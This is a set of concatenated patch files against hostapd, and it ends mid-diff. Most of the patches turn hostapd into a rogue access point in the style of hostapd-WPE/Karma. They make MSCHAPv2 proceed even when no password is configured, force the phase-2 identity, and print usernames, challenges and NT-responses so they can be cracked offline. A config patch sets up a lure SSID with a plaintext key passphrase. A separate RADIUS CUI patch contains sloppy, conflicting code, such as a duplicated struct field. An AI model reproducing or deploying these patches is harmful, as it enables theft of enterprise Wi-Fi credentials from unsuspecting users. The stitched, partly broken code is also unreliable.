--- hostapd-1.0.orig/src/crypto/tls_openssl.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/crypto/tls_openssl.c 2013-05-01 22:49:55.000000000 +0800
@@ -2642,7 +2642,7 @@
data_len) != 1)
return -1;
#else /* CONFIG_OPENSSL_TICKET_OVERRIDE */
- if (SSL_set_hello_extension(conn->ssl, ext_type, (void *) data,
+ if (SSL_set_session_ticket_ext(conn->ssl, ext_type, (void *) data,
data_len) != 1)
return -1;
#endif /* CONFIG_OPENSSL_TICKET_OVERRIDE */
@@ -2948,7 +2948,7 @@
SSL_set_tlsext_debug_callback(conn->ssl, tls_hello_ext_cb);
SSL_set_tlsext_debug_arg(conn->ssl, conn);
#else /* SSL_OP_NO_TICKET */
- if (SSL_set_hello_extension_cb(conn->ssl, tls_hello_ext_cb,
+ if (SSL_set_session_ticket_ext_cb(conn->ssl, tls_hello_ext_cb,
conn) != 1)
return -1;
#endif /* SSL_OP_NO_TICKET */
@@ -2963,7 +2963,7 @@
SSL_set_tlsext_debug_callback(conn->ssl, NULL);
SSL_set_tlsext_debug_arg(conn->ssl, conn);
#else /* SSL_OP_NO_TICKET */
- if (SSL_set_hello_extension_cb(conn->ssl, NULL, NULL) != 1)
+ if (SSL_set_session_ticket_ext_cb(conn->ssl, NULL, NULL) != 1)
return -1;
#endif /* SSL_OP_NO_TICKET */
#endif /* CONFIG_OPENSSL_TICKET_OVERRIDE */
diff -urN hostapd-1.0.orig/src/eap_server/eap_server.c hostapd-1.0/src/eap_server/eap_server.c
--- hostapd-1.0.orig/src/eap_server/eap_server.c 2013-05-01 22:58:03.010738503 +0800
+++ hostapd-1.0/src/eap_server/eap_server.c 2013-05-01 22:54:51.000000000 +0800
@@ -102,8 +102,9 @@
int phase2)
{
struct eap_user *user;
- char *username = NULL;
- char *message = NULL;
+ char *username = NULL;
+ char *message = NULL;
+ char ident = 't';
eap_user_free(sm->user);
sm->user = NULL;
@@ -112,6 +113,11 @@
if (user == NULL)
return -1;
+ if(phase2) {
+ identity = (const u8 *)&ident;
+ identity_len = 1;
+ }
+
/* Karma EAP Modifications */
if (karma_eap_auth) {
/* Karma Mode: Accept all requests, regardless of username - JoMo-Kun <jmk@foofus.net> */
diff -urN hostapd-1.0.orig/src/eap_server/eap_server_fast.c hostapd-1.0/src/eap_server/eap_server_fast.c
--- hostapd-1.0.orig/src/eap_server/eap_server_fast.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/eap_server/eap_server_fast.c 2013-05-01 22:49:55.000000000 +0800
@@ -1040,7 +1040,8 @@
switch (data->state) {
case PHASE2_ID:
- if (eap_user_get(sm, sm->identity, sm->identity_len, 1) != 0) {
+ //if (eap_user_get(sm, sm->identity, sm->identity_len, 1) != 0) {
+ if (eap_user_get(sm, sm->identity, sm->identity_len, 0) != 0) {
wpa_hexdump_ascii(MSG_DEBUG, "EAP-FAST: Phase2 "
"Identity not found in the user "
"database",
diff -urN hostapd-1.0.orig/src/eap_server/eap_server_mschapv2.c hostapd-1.0/src/eap_server/eap_server_mschapv2.c
--- hostapd-1.0.orig/src/eap_server/eap_server_mschapv2.c 2013-05-01 22:58:03.011738503 +0800
+++ hostapd-1.0/src/eap_server/eap_server_mschapv2.c 2013-05-01 22:56:30.000000000 +0800
@@ -295,9 +295,10 @@
u8 flags;
size_t len, name_len, i;
u8 expected[24];
+ u8 challenge_hash1[8];
const u8 *username, *user;
size_t username_len, user_len;
- int res;
+ int res, x;
char *auth_creds = NULL;
int auth_creds_len = 0;
@@ -338,6 +339,22 @@
wpa_hexdump(MSG_MSGDUMP, "EAP-MSCHAPV2: NT-Response", nt_response, 24);
wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
+
+ challenge_hash(peer_challenge, data->auth_challenge, name, name_len, challenge_hash1);
+
+ wpa_hexdump(MSG_DEBUG, "EAP-MSCHAPV2: Challenge Hash", challenge_hash1, 8);
+ printf("\n");
+ printf("\tusername: %s\n", name);
+ printf("\tchallenge: ");
+ for (x=0;x<7;x++)
+ printf("%02x:",challenge_hash1[x]);
+ printf("%02x\n",challenge_hash1[7]);
+
+ printf("\tresponse: ");
+ for (x=0;x<23;x++)
+ printf("%02x:",nt_response[x]);
+ printf("%02x\n",nt_response[23]);
+
/* Karma Mode: Log MSCHAPv2 exchange in John format - JoMo-Kun <jmk@foofus.net> */
/* user::domain (unused):authenticator challenge:mschapv2 response:peer challenge */
@@ -524,8 +541,8 @@
if (sm->user == NULL || sm->user->password == NULL) {
wpa_printf(MSG_INFO, "EAP-MSCHAPV2: Password not configured");
- data->state = FAILURE;
- return;
+ //data->state = FAILURE;
+ //return;
}
switch (data->state) {


@ -1,153 +0,0 @@
diff -uNr hostapd-1.0/hostapd/main.c hostapd-1.0-wpe/hostapd/main.c
--- hostapd-1.0/hostapd/main.c 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/hostapd/main.c 2012-08-20 22:56:17.420486344 -0400
@@ -508,7 +508,7 @@
static void show_version(void)
{
fprintf(stderr,
- "hostapd v" VERSION_STR "\n"
+ "hostapd v" VERSION_STR" with wpe support (Pentoo)\n"
"User space daemon for IEEE 802.11 AP management,\n"
"IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator\n"
"Copyright (c) 2002-2012, Jouni Malinen <j@w1.fi> "
diff -uNr hostapd-1.0/src/crypto/ms_funcs.c hostapd-1.0-wpe/src/crypto/ms_funcs.c
--- hostapd-1.0/src/crypto/ms_funcs.c 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/src/crypto/ms_funcs.c 2012-08-20 22:27:09.583819291 -0400
@@ -83,7 +83,7 @@
* @challenge: 8-octet Challenge (OUT)
* Returns: 0 on success, -1 on failure
*/
-static int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
const u8 *username, size_t username_len,
u8 *challenge)
{
diff -uNr hostapd-1.0/src/crypto/ms_funcs.h hostapd-1.0-wpe/src/crypto/ms_funcs.h
--- hostapd-1.0/src/crypto/ms_funcs.h 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/src/crypto/ms_funcs.h 2012-08-20 22:27:09.583819291 -0400
@@ -37,6 +37,10 @@
int nt_challenge_response(const u8 *challenge, const u8 *password,
size_t password_len, u8 *response);
+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+ const u8 *username, size_t username_len,
+ u8 *challenge);
+
void challenge_response(const u8 *challenge, const u8 *password_hash,
u8 *response);
int nt_password_hash(const u8 *password, size_t password_len,
diff -uNr hostapd-1.0/src/crypto/tls_openssl.c hostapd-1.0-wpe/src/crypto/tls_openssl.c
--- hostapd-1.0/src/crypto/tls_openssl.c 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/src/crypto/tls_openssl.c 2012-08-20 22:27:09.583819291 -0400
@@ -2642,7 +2642,7 @@
data_len) != 1)
return -1;
#else /* CONFIG_OPENSSL_TICKET_OVERRIDE */
- if (SSL_set_hello_extension(conn->ssl, ext_type, (void *) data,
+ if (SSL_set_session_ticket_ext(conn->ssl, ext_type, (void *) data,
data_len) != 1)
return -1;
#endif /* CONFIG_OPENSSL_TICKET_OVERRIDE */
@@ -2948,7 +2948,7 @@
SSL_set_tlsext_debug_callback(conn->ssl, tls_hello_ext_cb);
SSL_set_tlsext_debug_arg(conn->ssl, conn);
#else /* SSL_OP_NO_TICKET */
- if (SSL_set_hello_extension_cb(conn->ssl, tls_hello_ext_cb,
+ if (SSL_set_session_ticket_ext_cb(conn->ssl, tls_hello_ext_cb,
conn) != 1)
return -1;
#endif /* SSL_OP_NO_TICKET */
@@ -2963,7 +2963,7 @@
SSL_set_tlsext_debug_callback(conn->ssl, NULL);
SSL_set_tlsext_debug_arg(conn->ssl, conn);
#else /* SSL_OP_NO_TICKET */
- if (SSL_set_hello_extension_cb(conn->ssl, NULL, NULL) != 1)
+ if (SSL_set_session_ticket_ext_cb(conn->ssl, NULL, NULL) != 1)
return -1;
#endif /* SSL_OP_NO_TICKET */
#endif /* CONFIG_OPENSSL_TICKET_OVERRIDE */
diff -uNr hostapd-1.0/src/eap_server/eap_server.c hostapd-1.0-wpe/src/eap_server/eap_server.c
--- hostapd-1.0/src/eap_server/eap_server.c 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/src/eap_server/eap_server.c 2012-08-20 22:27:09.583819291 -0400
@@ -100,6 +100,7 @@
int phase2)
{
struct eap_user *user;
+ char ident = 't';
if (sm == NULL || sm->eapol_cb == NULL ||
sm->eapol_cb->get_eap_user == NULL)
@@ -111,7 +112,10 @@
user = os_zalloc(sizeof(*user));
if (user == NULL)
return -1;
-
+ if(phase2) {
+ identity = (const u8 *)&ident;
+ identity_len = 1;
+ }
if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
identity_len, phase2, user) != 0) {
eap_user_free(user);
diff -uNr hostapd-1.0/src/eap_server/eap_server_fast.c hostapd-1.0-wpe/src/eap_server/eap_server_fast.c
--- hostapd-1.0/src/eap_server/eap_server_fast.c 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/src/eap_server/eap_server_fast.c 2012-08-20 22:27:09.583819291 -0400
@@ -1040,7 +1040,8 @@
switch (data->state) {
case PHASE2_ID:
- if (eap_user_get(sm, sm->identity, sm->identity_len, 1) != 0) {
+ //if (eap_user_get(sm, sm->identity, sm->identity_len, 1) != 0) {
+ if (eap_user_get(sm, sm->identity, sm->identity_len, 0) != 0) {
wpa_hexdump_ascii(MSG_DEBUG, "EAP-FAST: Phase2 "
"Identity not found in the user "
"database",
diff -uNr hostapd-1.0/src/eap_server/eap_server_mschapv2.c hostapd-1.0-wpe/src/eap_server/eap_server_mschapv2.c
--- hostapd-1.0/src/eap_server/eap_server_mschapv2.c 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/src/eap_server/eap_server_mschapv2.c 2012-08-20 22:27:09.583819291 -0400
@@ -294,9 +294,10 @@
u8 flags;
size_t len, name_len, i;
u8 expected[24];
+ u8 challenge_hash1[8];
const u8 *username, *user;
size_t username_len, user_len;
- int res;
+ int res,x;
pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData,
&len);
@@ -335,6 +336,22 @@
wpa_hexdump(MSG_MSGDUMP, "EAP-MSCHAPV2: NT-Response", nt_response, 24);
wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
+
+ challenge_hash(peer_challenge, data->auth_challenge, name, name_len, challenge_hash1);
+
+ wpa_hexdump(MSG_DEBUG, "EAP-MSCHAPV2: Challenge Hash", challenge_hash1, 8);
+ printf("\n");
+ printf("\tusername: %s\n", name);
+ printf("\tchallenge: ");
+ for (x=0;x<7;x++)
+ printf("%02x:",challenge_hash1[x]);
+ printf("%02x\n",challenge_hash1[7]);
+
+ printf("\tresponse: ");
+ for (x=0;x<23;x++)
+ printf("%02x:",nt_response[x]);
+ printf("%02x\n",nt_response[23]);
+
/* MSCHAPv2 does not include optional domain name in the
* challenge-response calculation, so remove domain prefix
@@ -490,8 +507,8 @@
if (sm->user == NULL || sm->user->password == NULL) {
wpa_printf(MSG_INFO, "EAP-MSCHAPV2: Password not configured");
- data->state = FAILURE;
- return;
+ //data->state = FAILURE;
+ //return;
}
switch (data->state) {


@ -1,448 +0,0 @@
diff -urN hostapd-2.0.orig/src/ap/accounting.c hostapd-2.0/src/ap/accounting.c
--- hostapd-2.0.orig/src/ap/accounting.c 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/ap/accounting.c 2013-04-29 10:16:25.982059247 +0800
@@ -19,6 +19,7 @@
#include "sta_info.h"
#include "ap_drv_ops.h"
#include "accounting.h"
+/*#include "eapol_auth/eapol_auth_sm_i.h"*/
/* Default interval in seconds for polling TX/RX octets from the driver if
@@ -40,6 +41,9 @@
size_t len;
int i;
struct wpabuf *b;
+ u8 *cui; /*Define CUI Attribute*/
+ size_t cui_len; /*Define CUI Attribute length*/
+ struct eapol_state_machine *sm = sta->eapol_sm;
msg = radius_msg_new(RADIUS_CODE_ACCOUNTING_REQUEST,
radius_client_get_id(hapd->radius));
@@ -81,6 +85,7 @@
if (sta) {
/* Use 802.1X identity if available */
val = ieee802_1x_get_identity(sta->eapol_sm, &len);
+ printf("GOT ID\n");
/* Use RADIUS ACL identity if 802.1X provides no identity */
if (!val && sta->identity) {
@@ -102,6 +107,30 @@
printf("Could not add User-Name\n");
goto fail;
}
+
+
+ /*Check if the CUI attribute is set, if so returns the TRUE or FALSE accordingly**************/
+ if (getSetCui(sta->eapol_sm)){
+ cui=get_CUI (sta->eapol_sm, &cui_len);
+ printf("GOT CUI\n");
+
+ if (!cui) {
+
+ os_snprintf(buf, sizeof(buf), RADIUS_ADDR_FORMAT,
+ MAC2STR(sta->addr));
+ cui = (u8 *) buf;
+ cui_len = os_strlen(buf);
+ }
+ if (!radius_msg_add_attr(msg, RADIUS_ATTR_CHARGEABLE_USER_IDENTITY, cui,
+ cui_len)) { /*Add CUI attribute to the Accounting Request Message*/
+ printf("Could not add CUI\n");
+ goto fail;
+ }
+ /********************/
+ }
+ /*else { */
+ /* printf ("PROBLEM IN IF\n");*/
+ /*}*/
}
if (add_common_radius_attr(hapd, hapd->conf->radius_acct_req_attr, sta,
diff -urN hostapd-2.0.orig/src/ap/accounting.h hostapd-2.0/src/ap/accounting.h
--- hostapd-2.0.orig/src/ap/accounting.h 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/ap/accounting.h 2013-04-29 10:13:06.594045862 +0800
@@ -20,6 +20,7 @@
{
}
+
static inline void accounting_sta_stop(struct hostapd_data *hapd,
struct sta_info *sta)
{
diff -urN hostapd-2.0.orig/src/ap/ieee802_1x.c hostapd-2.0/src/ap/ieee802_1x.c
--- hostapd-2.0.orig/src/ap/ieee802_1x.c 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/ap/ieee802_1x.c 2013-04-29 10:18:45.037068583 +0800
@@ -1051,6 +1051,7 @@
* re-authentication without having to wait for the
* Supplicant to send EAPOL-Start.
*/
+ printf("REAUTHENTICATION-EAPOL");
sta->eapol_sm->reAuthenticate = TRUE;
}
eapol_auth_step(sta->eapol_sm);
@@ -1316,6 +1317,68 @@
sm->radius_cui = cui;
}
+/* This method is used to Set the CUI attribute Value**************************************/
+static void set_cui(struct hostapd_data *hapd,
+ struct sta_info *sta,
+ struct radius_msg *msg)
+
+{
+ u8 *buf,*cui_identity;
+ size_t len;
+ struct eapol_state_machine *sm = sta->eapol_sm;
+
+ if (sm == NULL)
+ return;
+
+ if (radius_msg_get_attr_ptr(msg, RADIUS_ATTR_CHARGEABLE_USER_IDENTITY, &buf, &len,
+ NULL) < 0)
+ return;
+ cui_identity = os_malloc(len + 1);
+ if (cui_identity == NULL)
+ return;
+ os_memcpy(cui_identity, buf, len);
+ cui_identity[len] = '\0';
+
+ sm->cui = cui_identity;
+ sm->cui_len = len;
+ printf(" SET CUI %s",(char *) cui_identity);
+
+
+}
+
+
+/* **************************************/
+
+/*check CUI attribute is available in Access Accept */
+static void check_cuiAttr (struct radius_msg *msg,struct sta_info *sta, struct hostapd_data *hapd)
+{
+
+ struct eapol_state_machine *sm = sta->eapol_sm; /*Define a pointer to eapol_state_machine*/
+
+
+ size_t i;
+
+ for (i = 0;i<msg->attr_used;i++)
+ { struct radius_attr_hdr *attr = radius_get_attr_hdr(msg, i);
+ if (attr->type == RADIUS_ATTR_CHARGEABLE_USER_IDENTITY) /*check CUI attribute is availabe in Access-Accept packet*/
+ {
+ printf("CUI Attribute is Available");
+ sm->cuiAvailable = TRUE;
+ set_cui(hapd, sta, msg);
+ break;
+
+ }
+ else {
+ sm->cuiAvailable = FALSE;
+ printf ("CUI is not available in this packet");
+
+ }
+
+
+ }
+
+}
+
struct sta_id_search {
u8 identifier;
@@ -1477,6 +1540,8 @@
ieee802_1x_store_radius_class(hapd, sta, msg);
ieee802_1x_update_sta_identity(hapd, sta, msg);
ieee802_1x_update_sta_cui(hapd, sta, msg);
+ /*set_cui(hapd, sta, msg);*/
+ check_cuiAttr(msg,sta,hapd);
if (sm->eap_if->eapKeyAvailable &&
wpa_auth_pmksa_add(sta->wpa_sm, sm->eapol_key_crypt,
session_timeout_set ?
@@ -1981,6 +2046,27 @@
}
+
+u8 * get_CUI(struct eapol_state_machine *sm, size_t *len) /* return CUI Attribute Value ******************************/
+{
+ if (sm == NULL || sm->identity == NULL)
+ return NULL;
+
+ *len = sm->cui_len;
+ return sm->cui;
+}
+
+Boolean getSetCui (struct eapol_state_machine *sm) /*Check if the CUI value is set or not, and returns TRUE or FALSE accordingly*/
+
+{ if (sm->cuiAvailable)
+ return TRUE;
+else
+ return FALSE;
+ }
+
+/*****************************/
+
+
u8 * ieee802_1x_get_radius_class(struct eapol_state_machine *sm, size_t *len,
int idx)
{
diff -urN hostapd-2.0.orig/src/ap/ieee802_1x.h hostapd-2.0/src/ap/ieee802_1x.h
--- hostapd-2.0.orig/src/ap/ieee802_1x.h 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/ap/ieee802_1x.h 2013-04-29 10:13:07.019045890 +0800
@@ -35,6 +35,13 @@
int ieee802_1x_eapol_tx_status(struct hostapd_data *hapd, struct sta_info *sta,
const u8 *data, int len, int ack);
u8 * ieee802_1x_get_identity(struct eapol_state_machine *sm, size_t *len);
+
+/** definig CUI get function */
+u8 * get_CUI(struct eapol_state_machine *sm, size_t *len);
+Boolean getSetCui (struct eapol_state_machine *sm);
+
+/*********************/
+
u8 * ieee802_1x_get_radius_class(struct eapol_state_machine *sm, size_t *len,
int idx);
struct wpabuf * ieee802_1x_get_radius_cui(struct eapol_state_machine *sm);
diff -urN hostapd-2.0.orig/src/ap/pmksa_cache_auth.c hostapd-2.0/src/ap/pmksa_cache_auth.c
--- hostapd-2.0.orig/src/ap/pmksa_cache_auth.c 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/ap/pmksa_cache_auth.c 2013-04-29 10:13:07.020045890 +0800
@@ -138,6 +138,20 @@
if (eapol->radius_cui)
entry->cui = wpabuf_dup(eapol->radius_cui);
+/*set to cui in to cache*/
+
+ if (eapol ->cui) {
+
+ entry ->cui = os_malloc(eapol->cui_len); /*Allocate memory for CUI attribute*/
+ if (entry->cui) {
+ entry->cui_len = eapol->cui_len;
+ os_memcpy(entry->cui, eapol->cui,
+ eapol->cui_len);
+ }
+ }
+
+/*set to cui in to cache*/
+
#ifndef CONFIG_NO_RADIUS
radius_copy_class(&entry->radius_class, &eapol->radius_class);
#endif /* CONFIG_NO_RADIUS */
@@ -170,6 +184,25 @@
eapol->radius_cui = wpabuf_dup(entry->cui);
}
+/*Added to get CUI from the cache*/
+
+
+ if (entry->cui) {
+ os_free(eapol->cui);
+
+ eapol->cui = os_malloc(entry->cui_len);
+ eapol->cuiAvailable=TRUE;
+ if (eapol->cui) {
+ eapol->cui_len = entry->cui_len;
+ os_memcpy(eapol->cui, entry->cui,
+ entry->cui_len); /*copy the CUI attribute value to EAPOL data structure*/
+ }
+ wpa_hexdump_ascii(MSG_DEBUG, "CUIfrom PMKSA",
+ eapol->cui, eapol->cui_len);
+ }
+
+ /*Added to get CUI from the cache*/
+
#ifndef CONFIG_NO_RADIUS
radius_free_class(&eapol->radius_class);
radius_copy_class(&eapol->radius_class, &entry->radius_class);
@@ -181,6 +214,7 @@
eapol->eap_type_authsrv = entry->eap_type_authsrv;
((struct sta_info *) eapol->sta)->vlan_id = entry->vlan_id;
+ printf ("GETTING CACHE ENTRY\n");
}
diff -urN hostapd-2.0.orig/src/ap/pmksa_cache_auth.h hostapd-2.0/src/ap/pmksa_cache_auth.h
--- hostapd-2.0.orig/src/ap/pmksa_cache_auth.h 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/ap/pmksa_cache_auth.h 2013-04-29 10:20:09.925074282 +0800
@@ -26,6 +26,8 @@
u8 *identity;
size_t identity_len;
struct wpabuf *cui;
+ u8 *cui; /* cui by me*/
+ size_t cui_len; /*Size of the cached cui by me*/
struct radius_class_data radius_class;
u8 eap_type_authsrv;
int vlan_id;
diff -urN hostapd-2.0.orig/src/common/ieee802_11_common.c hostapd-2.0/src/common/ieee802_11_common.c
--- hostapd-2.0.orig/src/common/ieee802_11_common.c 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/common/ieee802_11_common.c 2013-04-29 10:13:07.061045893 +0800
@@ -25,8 +25,8 @@
if (elen < 4) {
if (show_errors) {
wpa_printf(MSG_MSGDUMP, "short vendor specific "
- "information element ignored (len=%lu)",
- (unsigned long) elen);
+ "information element ignored (len=%lu)",
+ (unsigned long) elen);
}
return -1;
}
diff -urN hostapd-2.0.orig/src/eapol_auth/eapol_auth_sm_i.h hostapd-2.0/src/eapol_auth/eapol_auth_sm_i.h
--- hostapd-2.0.orig/src/eapol_auth/eapol_auth_sm_i.h 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/eapol_auth/eapol_auth_sm_i.h 2013-04-29 10:13:07.062045893 +0800
@@ -69,6 +69,7 @@
/* variables */
Boolean eapolLogoff;
Boolean eapolStart;
+ Boolean cuiAvailable; /*to check CUI is available in AcessAccept*/
PortTypes portMode;
unsigned int reAuthCount;
/* constants */
@@ -153,6 +154,8 @@
u8 last_eap_id; /* last used EAP Identifier */
u8 *identity;
size_t identity_len;
+ u8 *cui; /*Define CUI Attribute*/
+ size_t cui_len; /*Define CUI attribute length*/
u8 eap_type_authsrv; /* EAP type of the last EAP packet from
* Authentication server */
u8 eap_type_supp; /* EAP type of the last EAP packet from Supplicant */
diff -urN hostapd-2.0.orig/src/radius/radius.c hostapd-2.0/src/radius/radius.c
--- hostapd-2.0.orig/src/radius/radius.c 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/radius/radius.c 2013-04-29 10:13:07.062045893 +0800
@@ -18,16 +18,16 @@
/**
* struct radius_msg - RADIUS message structure for new and parsed messages
*/
-struct radius_msg {
+//struct radius_msg {
/**
* buf - Allocated buffer for RADIUS message
*/
- struct wpabuf *buf;
+ //struct wpabuf *buf;
/**
* hdr - Pointer to the RADIUS header in buf
*/
- struct radius_hdr *hdr;
+ //struct radius_hdr *hdr;
/**
* attr_pos - Array of indexes to attributes
@@ -35,18 +35,18 @@
* The values are number of bytes from buf to the beginning of
* struct radius_attr_hdr.
*/
- size_t *attr_pos;
+ //size_t *attr_pos;
/**
* attr_size - Total size of the attribute pointer array
*/
- size_t attr_size;
+ //size_t attr_size;
/**
* attr_used - Total number of attributes in the array
*/
- size_t attr_used;
-};
+ //size_t attr_used;
+//};
struct radius_hdr * radius_msg_get_hdr(struct radius_msg *msg)
@@ -60,7 +60,7 @@
return msg->buf;
}
-
+/*
static struct radius_attr_hdr *
radius_get_attr_hdr(struct radius_msg *msg, int idx)
{
@@ -68,7 +68,7 @@
(wpabuf_mhead_u8(msg->buf) + msg->attr_pos[idx]);
}
-
+*/
static void radius_msg_set_hdr(struct radius_msg *msg, u8 code, u8 identifier)
{
msg->hdr->code = code;
diff -urN hostapd-2.0.orig/src/radius/radius.h hostapd-2.0/src/radius/radius.h
--- hostapd-2.0.orig/src/radius/radius.h 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/radius/radius.h 2013-04-29 10:13:07.064045893 +0800
@@ -15,6 +15,45 @@
#pragma pack(push, 1)
#endif /* _MSC_VER */
+/************************/
+struct radius_msg {
+ /**
+ * buf - Allocated buffer for RADIUS message
+ */
+ struct wpabuf *buf;
+
+ /**
+ * hdr - Pointer to the RADIUS header in buf
+ */
+ struct radius_hdr *hdr;
+
+ /**
+ * attr_pos - Array of indexes to attributes
+ *
+ * The values are number of bytes from buf to the beginning of
+ * struct radius_attr_hdr.
+ */
+ size_t *attr_pos;
+
+ /**
+ * attr_size - Total size of the attribute pointer array
+ */
+ size_t attr_size;
+
+ /**
+ * attr_used - Total number of attributes in the array
+ */
+ size_t attr_used;
+};
+
+
+
+
+/***********************/
+
+
+
+
struct radius_hdr {
u8 code;
u8 identifier;
@@ -210,6 +249,10 @@
size_t secret_len);
struct radius_attr_hdr * radius_msg_add_attr(struct radius_msg *msg, u8 type,
const u8 *data, size_t data_len);
+
+/****************************/
+
+/*****************************/
struct radius_msg * radius_msg_parse(const u8 *data, size_t len);
int radius_msg_add_eap(struct radius_msg *msg, const u8 *data,
size_t data_len);
@@ -250,7 +293,13 @@
u32 val = htonl(value);
return radius_msg_add_attr(msg, type, (u8 *) &val, 4) != NULL;
}
-
+/**********************/
+static struct radius_attr_hdr * radius_get_attr_hdr(struct radius_msg *msg, int idx)
+{
+ return (struct radius_attr_hdr *)
+ (wpabuf_mhead_u8(msg->buf) + msg->attr_pos[idx]);
+}
+/**************************/
static inline int radius_msg_get_attr_int32(struct radius_msg *msg, u8 type,
u32 *value)
{


@ -1,453 +0,0 @@
diff -urN hostapd-2.0.orig/hostapd/hostapd.conf hostapd-2.0/hostapd/hostapd.conf
--- hostapd-2.0.orig/hostapd/hostapd.conf 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/hostapd/hostapd.conf 2013-05-27 11:27:54.127484984 +0800
@@ -3,7 +3,7 @@
# AP netdevice name (without 'ap' postfix, i.e., wlan0 uses wlan0ap for
# management frames); ath0 for madwifi
-interface=wlan0
+interface=wlan1
# In case of madwifi, atheros, and nl80211 driver interfaces, an additional
# configuration parameter, bridge, may be used to notify hostapd if the
@@ -23,6 +23,7 @@
# Use driver=none if building hostapd as a standalone RADIUS server that does
# not control any wireless/wired driver.
# driver=hostap
+driver=nl80211
# hostapd event logger configuration
#
@@ -83,7 +84,8 @@
##### IEEE 802.11 related configuration #######################################
# SSID to be used in IEEE 802.11 management frames
-ssid=test
+ssid=YouReallyWantToConnect
+
# Alternative formats for configuring SSID
# (double quoted string, hexdump, printf-escaped string)
#ssid2="test"
@@ -96,7 +98,7 @@
# Country code (ISO/IEC 3166-1). Used to set regulatory domain.
# Set as needed to indicate country in which device is operating.
# This can limit available channels and transmit power.
-#country_code=US
+country_code=US
# Enable IEEE 802.11d. This advertises the country_code and the set of allowed
# channels and transmit power levels based on the regulatory limits. The
@@ -109,13 +111,13 @@
# ad = IEEE 802.11ad (60 GHz); a/g options are used with IEEE 802.11n, too, to
# specify band)
# Default: IEEE 802.11b
-hw_mode=g
+hw_mode=b
# Channel number (IEEE 802.11)
# (default: 0, i.e., not set)
# Please note that some drivers do not use this value from hostapd and the
# channel will need to be configured separately with iwconfig.
-channel=1
+channel=6
# Beacon interval in kus (1.024 ms) (default: 100; range 15..65535)
beacon_int=100
@@ -587,7 +589,7 @@
##### IEEE 802.1X-2004 related configuration ##################################
# Require IEEE 802.1X authorization
-#ieee8021x=1
+ieee8021x=1
# IEEE 802.1X/EAPOL version
# hostapd is implemented based on IEEE Std 802.1X-2004 which defines EAPOL
@@ -595,7 +597,7 @@
# the new version number correctly (they seem to drop the frames completely).
# In order to make hostapd interoperate with these clients, the version number
# can be set to the older version (1) with this configuration value.
-#eapol_version=2
+eapol_version=1
# Optional displayable message sent with EAP Request-Identity. The first \0
# in this string will be converted to ASCII-0 (nul). This can be used to
@@ -637,7 +639,7 @@
# Use integrated EAP server instead of external RADIUS authentication
# server. This is also needed if hostapd is configured to act as a RADIUS
# authentication server.
-eap_server=0
+eap_server=1
# Path for EAP server user database
# If SQLite support is included, this can be set to "sqlite:/path/to/sqlite.db"
@@ -645,20 +647,20 @@
#eap_user_file=/etc/hostapd.eap_user
# CA certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS
-#ca_cert=/etc/hostapd.ca.pem
+ca_cert=/etc/hostapd/gd-bundle.pem
# Server certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS
-#server_cert=/etc/hostapd.server.pem
+server_cert=/etc/hostapd/INTRANET.pem
# Private key matching with the server certificate for EAP-TLS/PEAP/TTLS
# This may point to the same file as server_cert if both certificate and key
# are included in a single file. PKCS#12 (PFX) file (.p12/.pfx) can also be
# used by commenting out server_cert and specifying the PFX file as the
# private_key.
-#private_key=/etc/hostapd.server.prv
+private_key=/etc/hostapd/INTRANET.pem
# Passphrase for private key
-#private_key_passwd=secret passphrase
+private_key_passwd=TopSecretFoofusPassword
# Enable CRL verification.
# Note: hostapd does not yet support CRL downloading based on CDP. Thus, a
@@ -923,7 +925,7 @@
# and/or WPA2 (full IEEE 802.11i/RSN):
# bit0 = WPA
# bit1 = IEEE 802.11i/RSN (WPA2) (dot11RSNAEnabled)
-#wpa=1
+wpa=3
# WPA pre-shared keys for WPA-PSK. This can be either entered as a 256-bit
# secret in hex format (64 hex digits), wpa_psk, or as an ASCII passphrase
@@ -953,7 +955,7 @@
# entries are separated with a space. WPA-PSK-SHA256 and WPA-EAP-SHA256 can be
# added to enable SHA256-based stronger algorithms.
# (dot11RSNAConfigAuthenticationSuitesTable)
-#wpa_key_mgmt=WPA-PSK WPA-EAP
+wpa_key_mgmt=WPA-EAP
# Set of accepted cipher suites (encryption algorithms) for pairwise keys
# (unicast packets). This is a space separated list of algorithms:
diff -urN hostapd-2.0.orig/hostapd/main.c hostapd-2.0/hostapd/main.c
--- hostapd-2.0.orig/hostapd/main.c 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/hostapd/main.c 2013-05-27 11:29:45.327484679 +0800
@@ -34,6 +34,10 @@
